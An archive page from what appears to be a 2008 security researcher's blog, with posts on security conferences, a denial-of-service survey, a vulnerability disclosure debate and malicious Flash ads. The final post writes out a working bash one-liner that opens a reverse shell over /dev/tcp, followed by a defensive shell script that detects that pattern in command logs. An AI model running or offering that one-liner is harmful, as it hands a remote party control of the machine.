Archive for the ‘Security’ Category

Five Part Non-Technical Series

August 20th, 2008 No comments

Hey All,

I wanted to do a brief repost over here to direct everyone to the 5-part non-technical blog series that I did on cons (for the most part) and con experiences. This was my contribution to blogging following Blackhat / DEFCON.

  1. Being a Research Engineer at a Blackhat Booth
  2. Competitors Can Be Civil
  3. Why DEFCON Sucks
  4. Why the Social Aspect of Cons is Important
  5. What Can Be Done to Improve the Cons.

Enjoy!

Denial of Service Survey So Far…

August 19th, 2008 1 comment

Hey All,

Thanks to everyone who's filled it out; for those of you who haven't... you still can (survey). A large number of people are preferring to stay anonymous, but I have gotten some rather interesting comments. To date 169 people have filled out the survey. If all goes well, I'm hoping to start analyzing the results after about a week or so.

To clarify, for anyone who reads this first... When I say Denial of Service, I'm not considering packet flooding (these days you essentially need DDoS for that)... I'm thinking of single packets that cause servers to crash, or malformed pages that cause browsers to crash. That being said, I don't want to influence anyone's answers... that's why I provided plenty of places for notes. Feel free to tell me what you really think.

Lastly, in the goal of making an interesting whitepaper out of this, I've started contacting vendors. Currently I've contacted Adobe, Apple, Google, Microsoft, Red Hat and Sun. I've asked them to answer the survey (and provide me with unique information via email that they will put in the name, email and url portions (for proper identification)) and I've passed on a few vendor specific questions. I've taken the route of contacting their PR agencies, so we'll see what happens.

Denial of Service Survey

August 18th, 2008 No comments

Hey All,

Quick post here as I'm trying to gather some statistics related to Denial of Service and people's perception related to it. I've posted a small survey @ http://tinyurl.com/dossurvey, if anyone is interested in filling it out.

Thanks,
Tyler

Categories: IT, Security

Blackhat / DEFCON are over… Next is SecTor

August 16th, 2008 1 comment

Hey Everyone,

So Blackhat/Defcon is behind us... Instead of blogging about the talks, I've taken a different approach and I've been doing some non-technical blogging. In the end it will be a 5-part series, but the first three are already up.

They are:

  1. Being a Research Engineer at a Blackhat Booth
  2. Competitors Can Be Civil
  3. Why DEFCON Sucks

The last two will most likely appear early next week.

Also, now that Blackhat / DEFCON are over... What's next? As far as I know the next Con I'll be attending is SecTor. Last year was the first SecTor and I had the opportunity to attend. SecTor will actually make its way into my upcoming blog series (from above) on the VERT Blog. That being said, I wanted to remind people that it's coming up; after all... it's held in Toronto and I live in Toronto, so the more people that attend, the more people I get to meet.

For anyone who didn't get a chance to visit SecTor last year and is curious about the quality / style of the talks, I tried to write up everything that I saw.

Of course, these are biased because they're all my opinion, but I do recommend the Con for anyone that can make it up this way. Let me know if you'll be coming up and we'll make arrangements to get together for a beer.

Wanted to Link to This

May 23rd, 2008 No comments

I'm not back yet, but I wanted to link to a blog post I threw up over on the nCircle VERT blog before I left for my holidays.

XP IPv6 DoS & IPv6 Networking Issues with W2K3 and Ubuntu (Also a DoS)

This doesn't have a CVE (yet?), but it does have a BID.

Next week, I'll be back to posting regularly.


All I can say is ‘Wow’

May 8th, 2008 2 comments

I read this today on a local news site and the only thought that went through my head was "wow"... Essentially a malicious individual hacked the Epilepsy Foundation's website and posted hundreds of rapidly flashing images. While I don't condone it... I can understand why people think they should target websites for profit or pride... but this? It's just plain mean... It makes me wonder what the world is coming to.

Update: Apparently this is old news and I'm a little slow finding out about it.


Comments on Core Security’s Wonderware advisory

May 8th, 2008 2 comments

There were a couple of random things that I wanted to comment on.

The first was a post by Dave Lewis of Liquidmatrix. The post in question is a discussion of a Wonderware advisory released by Core Security and the level of detail that they provided. Dave doesn't agree with the level of detail provided... as they had details on how to exploit the vulnerability and even showed the assembly from the vulnerable function. He also comments that this isn't responsible disclosure. I'm <sarcasm>really glad to see this debate is coming up again</sarcasm>... but really, where's the lack of responsible disclosure? Core reported the vulnerability to the vendor (repeatedly) and went out of their way to ensure the vendor was aware; this is more than a lot of people / companies do. They then continually pushed their advisory release date to accommodate the company. These details are being released after the patch as well.

There's absolutely nothing wrong with this... it's really no different from the level of detail provided by other security vendors that release advisories. Once the patch is out there isn't much to stop malicious individuals from obtaining the assembly of the vulnerable function... a copy of IDA Pro and BinDiff is really all they need. Outside of the assembly... the level of detail provided is really the same as most other security vendors that release advisories. I've seen them include some sort of binary analysis in the past... and most of them contain a text write-up... here's an example from TippingPoint / ZDI with more than enough text to locate the vulnerability:

The specific flaw exists in the oninit.exe process that listens by default on TCP port 1526. During authentication, the process does not validate the length of the supplied user password. An attacker can provide an overly long password and overflow a stack based buffer resulting in arbitrary code execution.

Part of the problem with the InfoSec battle is that the bad guys have essentially unlimited time, whereas IS employees have families and lives and work a set schedule. The Core advisory has set internal security teams on their way to developing their own exploits should they need to; without it they'd have had a lot more work to do and it would have taken them more time. Core did everything short of releasing the related Python, and you can't really blame them, since then they'd be giving away their product for free. In the end, what they did was, in my opinion, beneficial to all.

It's one thing to simply release details, but as soon as someone works with the vendor you can't really cry foul when they publish the details. At least not on the 'responsible disclosure' front... because they've followed responsible disclosure, and in this case Core Security hasn't done anything different from a number of vendors. Microsoft Tuesday is coming up, so watch the mailing lists: each vendor that has reported a vuln usually sends out some sort of advisory, and these range from brief overviews to full binary analysis and specific details on exploiting the vulnerability. We've seen it before and we'll see it again... but the patch is out, so they aren't helping the malicious individuals... just the good guys who have time constraints.

Malicious Flash on LiveJournal.com

April 22nd, 2008 No comments

I don't have much to add, simply details from the original post. Spyware Sucks has a post up documenting some malicious flash that is being served from LiveJournal.com (from one of their banner ads). Just thought I should share to keep people informed.


Kinda Quiet on the CDO Front

April 21st, 2008 No comments

I've been kinda quiet here the last few days... That being said, I've been posting quite a bit on the nCircle VERT blog. I decided that I wouldn't cross post between blogs and I won't post links to CDO on the nCircle blog for no reason; however, I will post links to the nCircle blog on here...

In the past few days I've posted these stories on the nCircle blog... feel free to give them a read:

I've got a couple interesting blog posts in the works, that will most likely show up here in the near future... but for now there's something to read.


Bash-based Reverse Shell

April 17th, 2008 No comments

This is really cool... Neohapsis has a great blog post on how a one line bash shell command can create a reverse shell (via Infosec Ramblings).

Think about all those times when you needed a single command line to create a reverse shell... this will do it:

exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

That's it... plain and simple and you're done... no need for any outside tools... just the ability to run built-in shell commands.
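From the defender's side, the same /dev/tcp redirection is easy to spot in shell history exports or process-audit records. The following is an added example, not from the original post or from Neohapsis: a small POSIX shell detector that flags command lines binding a standard descriptor (stdin, stdout or stderr, numbered or not) to bash's /dev/tcp or /dev/udp pseudo-paths, while leaving alone the common benign use of a higher-numbered descriptor such as exec 3<>/dev/tcp/host/80 for a scripted port or HTTP check. The function names and the sample command lines are constructed for this example.

```shell
#!/bin/sh
# Added example: detector for the bash network-redirection reverse-shell pattern.
# Not part of the original post; function names and sample lines are constructed here.

# Return 0 when the command line attaches fd 0, 1 or 2 (or an unnumbered
# redirection, which defaults to stdin/stdout) to /dev/tcp or /dev/udp.
# A numbered descriptor such as "exec 3<>/dev/tcp/host/80" is not flagged:
# that is the usual shape of a scripted port or HTTP check.
binds_std_fd_to_socket() {
    printf '%s\n' "$1" | grep -Eq \
        '(^|[[:space:]])[012]?(&>|[<>][<>]?&?)[[:space:]]*/dev/(tcp|udp)/[^/[:space:]]+/[^[:space:]]+'
}

# Read command lines from stdin, print "ALERT <line>" for each match and a
# final "alerts=N" summary line.
scan_cmdlines() {
    alerts=0
    while IFS= read -r line; do
        if binds_std_fd_to_socket "$line"; then
            printf 'ALERT %s\n' "$line"
            alerts=$((alerts + 1))
        fi
    done
    printf 'alerts=%s\n' "$alerts"
}

# Constructed sample: four command-line records, one of them the one-liner
# from the post above, one a benign fd-3 port check.
sample_cmdlines() {
    cat <<'EOF'
ls -la /var/log
exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
exec 3<>/dev/tcp/localhost/80
grep -r TODO /srv/app
EOF
}

# Run over the sample; in practice feed it a history or audit export instead.
sample_cmdlines | scan_cmdlines
```

The regex is deliberately narrow: it only fires when the socket path is the target of a redirection on a standard descriptor, which is what makes the one-liner a working shell rather than a connectivity probe. Note that /dev/tcp is a bash feature, not a kernel device, so the detection belongs at the command-line layer (auditd EXECVE records, shell history, EDR process telemetry) rather than in file-access monitoring.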
